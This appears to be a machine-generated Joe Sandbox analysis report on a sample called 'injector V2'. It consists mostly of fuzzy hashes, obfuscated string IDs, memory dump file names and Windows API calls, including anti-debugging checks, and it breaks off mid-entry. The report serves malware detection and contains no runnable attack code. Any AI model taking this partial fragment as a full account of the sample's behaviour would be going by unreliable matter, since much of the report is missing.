                                                                                    • Instruction ID: 0ff9528411ddc48cbd57ec4e62b6b214c9dc22e6c9dd0d49b9e929359a4dd675
                                                                                    • Opcode Fuzzy Hash: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
                                                                                    • Instruction Fuzzy Hash: 30D2FB7AA056004B4A2CCA2895E163D72D3DBD877077C8BDFD4334B7E4CA719F45AA06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $^t0$$^t0$$^t0$6Haz$6Haz$6Haz$=am#$>am#$>am#$>am#$kX]E$lX]E$lX]E$lX]E
                                                                                    • API String ID: 0-4155389939
                                                                                    • Opcode ID: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
                                                                                    • Instruction ID: f28344041a9f68d5fa22498c5d9443de6ceb4c22d51c9c62a51cac5c4870f5ce
                                                                                    • Opcode Fuzzy Hash: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
                                                                                    • Instruction Fuzzy Hash: EBD23A36E152158B8F2C9A2CD5E117EB3D1DB54320B3506EEED23AB3E0CB32DD469691
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: VlUi$WlUi$WlUi$WlUi$WlUi$1I#$1I#$1I#$1I#$U/$U/$U/$U/
                                                                                    • API String ID: 0-3233344364
                                                                                    • Opcode ID: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
                                                                                    • Instruction ID: 706946b3042eeaaf5c89fe4d09d534ee24ecbb63f458c933df2e1c3d99713a15
                                                                                    • Opcode Fuzzy Hash: 7d9c895474c0423a3e128664574922b9dd8e4897013eb72fa4705b5557de1460
                                                                                    • Instruction Fuzzy Hash: 40526F3664C7004F5A6CC62999C812E77D2DBA4320B248AD1EA26CF3F5FF60DF45E642
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: string too long$S@$eIY$eIY$eIY
                                                                                    • API String ID: 0-2211027269
                                                                                    • Opcode ID: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
                                                                                    • Instruction ID: 71ef1e07bdf05296278c4bce1f8ad97c67ddfe2932e0035b2085d1c06cd188bb
                                                                                    • Opcode Fuzzy Hash: 3a92852118e25de9ca059e9154b1e6d39ea07e4758f4c9a03d05b6ac093ea874
                                                                                    • Instruction Fuzzy Hash: 4A9149363042218B9E298A2CA9D523D3AD39BE0360F7D89D7E825DF7E4DB35CC458742
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C`lB$C`lB$C`lB$9z`$9z`$9z`$9z`
                                                                                    • API String ID: 0-915920326
                                                                                    • Opcode ID: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
                                                                                    • Instruction ID: 2c549c36efc044b2d2fe7fa0d289a286d315f1b5fc0fd172a690d66ce0f81439
                                                                                    • Opcode Fuzzy Hash: 919b27690586ad3199399c051936a3231d5cbbdf850362b9072eb6b1a48dfaf7
                                                                                    • Instruction Fuzzy Hash: 3781F43A511B109BCA344B28598471E77D2AB90364F368BD6DD22EF7F0CB36DC468B81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @\$A\$A\$A\$"!-$"!-$"!-
                                                                                    • API String ID: 0-1374745079
                                                                                    • Opcode ID: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
                                                                                    • Instruction ID: f7c5257fc0998ae67df1b368a24a50e81752cfacb1bea5835ec14fc8b69bdb22
                                                                                    • Opcode Fuzzy Hash: 69ac5aa4550c41e1ba5c5d73d5566c1d209946ed39a2dc1cae421951b56c7645
                                                                                    • Instruction Fuzzy Hash: 507107362047608B4D2C9A2879E953D63C3EBE6371B3986CFD91B8B6E4DF714C815A43
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: -'K`$.'K`$.'K`$.'K`$$\Z$$\Z
                                                                                    • API String ID: 0-1124325746
                                                                                    • Opcode ID: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
                                                                                    • Instruction ID: f06505c316897102fbffc14ff019bc58fd962788a82c66e8064d5fc84aa0605d
                                                                                    • Opcode Fuzzy Hash: bc79fa3c6b0df019b7fb551830d665087249714335e5df840ff1afbd2a5ed912
                                                                                    • Instruction Fuzzy Hash: 74122F76A043108F8B284B2874D46BDB7E2EB55360F7A07DAE912E73E0DA25DD85C781
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ?B;$@B;$@B;$@B;$@B;
                                                                                    • API String ID: 0-1209347523
                                                                                    • Opcode ID: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
                                                                                    • Instruction ID: 981705177ae43eac6597735922e7296191ef055ef1ad491c6a5c98f798cb60ad
                                                                                    • Opcode Fuzzy Hash: 94d72e2eb94082fb21df0caaffd0a05bee2b1eab2585fe4fdab0626c1cf3eaf6
                                                                                    • Instruction Fuzzy Hash: B932073A7147005F4A28CA2899C456FB3E79BD8B34B358786E522CB7F4DB34DE86C641
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CyN$CyN$CyN$CyN$CyN
                                                                                    • API String ID: 0-4075027903
                                                                                    • Opcode ID: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
                                                                                    • Instruction ID: 5bd58dca2d682be4c2be47dca8cc642a36103c55e9b894e82004a9341be50f03
                                                                                    • Opcode Fuzzy Hash: df6a7943b541e0bde5374bb44ada6ffe104fdf6ae21c714f5394701ef89ba81f
                                                                                    • Instruction Fuzzy Hash: 2812F73A6047004B4A28CB2E56C462E72D29BDA331F758BD6E512CB7F4DB29DD4BC742
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: b~N$c~N$c~N$c~N$c~N
                                                                                    • API String ID: 0-1905032987
                                                                                    • Opcode ID: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
                                                                                    • Instruction ID: b860ab4937dbb26c7307149c4699e7ab48ac46fd8a371983d54518367a7ad2c1
                                                                                    • Opcode Fuzzy Hash: e6b4591400721c3c95bc73cfaa475e1206c99089188a1c4181b220de9a9d0da1
                                                                                    • Instruction Fuzzy Hash: 2FA1FA7528C7404B4E288F6C55C422E73E6DBA8320B688AE6DD21CB2D4DF64DF45F646
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: A\$A\$PbQ$"!-$"!-
                                                                                    • API String ID: 0-1954403065
                                                                                    • Opcode ID: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
                                                                                    • Instruction ID: 86c2b3492af1b99e8ad048e9aff66426349be1ec6e6b931f70a044ce2236062e
                                                                                    • Opcode Fuzzy Hash: 67841456246173b1c413a1f682e6299e290322b4b7eff75176ed0f21b7518d93
                                                                                    • Instruction Fuzzy Hash: D271D2362047604B4E2C8A2879E453D22C3EFE6331B3986DBD91F9B6E8DA354C815A47
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                    • Instruction ID: 26519f787e9162f85b47a5498e3652c7fc16b181adb8d4893e790f1473ee2040
                                                                                    • Opcode Fuzzy Hash: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                    • Instruction Fuzzy Hash: F971C47190515AAFDF20AF38DC89BBABBF9EB05304F1441E9E449A7211DA358F85AF10
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B49787
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                    • Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
                                                                                    • Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                    • Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45
                                                                                    APIs
                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00B44D66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_destroy
                                                                                    • String ID:
                                                                                    • API String ID: 4194217158-0
                                                                                    • Opcode ID: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
                                                                                    • Instruction ID: 78f63dc66f3ce5f10188f0bccfdd6f5f06ea3ff75bdcbb5fad9fc7ba040643b4
                                                                                    • Opcode Fuzzy Hash: d1f2018f4cbf707ae15a2092ede6ff12df315ba00a63aed5c012fbbcf6d577df
                                                                                    • Instruction Fuzzy Hash: 27913E3A6147004F5D28DE2869C532D73D29AA53317688EF2E922CB3E9DB24CF55E351
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00B4B892
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B4B89C
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00B4B8A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
                                                                                    • Instruction ID: 8edcad0390d972f4f54210c8ed6aad2d6abee0fe3c46f67349142398d94a6b58
                                                                                    • Opcode Fuzzy Hash: 3bd5582810baee16d8f22241fd5c50ebbe2ad62629a571158119ef7d92cc4cfd
                                                                                    • Instruction Fuzzy Hash: E83192759013299BCB21DF68D989B8DBBF8EF18310F5041EAE41CA7290EB709F859F45
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: dUb$ dUb$ dUb
                                                                                    • API String ID: 0-1696577624
                                                                                    • Opcode ID: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
                                                                                    • Instruction ID: 31599825eb04c8fb21ccf7a0dadf86fd38b69347395dc12731e487b281d858be
                                                                                    • Opcode Fuzzy Hash: c99ae8837af4524e64abca57c619fc93d1b4092d6294c319d914a32cd4bface6
                                                                                    • Instruction Fuzzy Hash: 82D15A3DD04308475A2CEF2C96C517D72D3D7D4370F284ADAD8264BBE4E6628FC9A646
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Mnj$Mnj$Mnj
                                                                                    • API String ID: 0-3324928681
                                                                                    • Opcode ID: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
                                                                                    • Instruction ID: 1f1de767dc7bf1a3e0750c4128b440b588de0039c66fb7460bcf03f5ec6494c5
                                                                                    • Opcode Fuzzy Hash: 78bc169696fd6d201b59724774710c426360b8faa166af8e2b62c270681c7e1b
                                                                                    • Instruction Fuzzy Hash: 1ED14C75205714CB993CC628E8C912D72D3EB98321F780FE6E467CB3A1DB29ED419653
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Q_$i.^$j.^
                                                                                    • API String ID: 0-3437208586
                                                                                    • Opcode ID: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
                                                                                    • Instruction ID: 9d305f997e44cba9b02ac97b077cd1e02c5da8e75baf5a9c7424bddc9e4d9d30
                                                                                    • Opcode Fuzzy Hash: c3492964beccc3518d56c428bc9a6d0ae9cd5c824e2224b1afb55c1831dd33bb
                                                                                    • Instruction Fuzzy Hash: 988127752083018B9A3C96245CE463DF3C6EFA5361FB956D9F913DBAA0DE218D458383
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
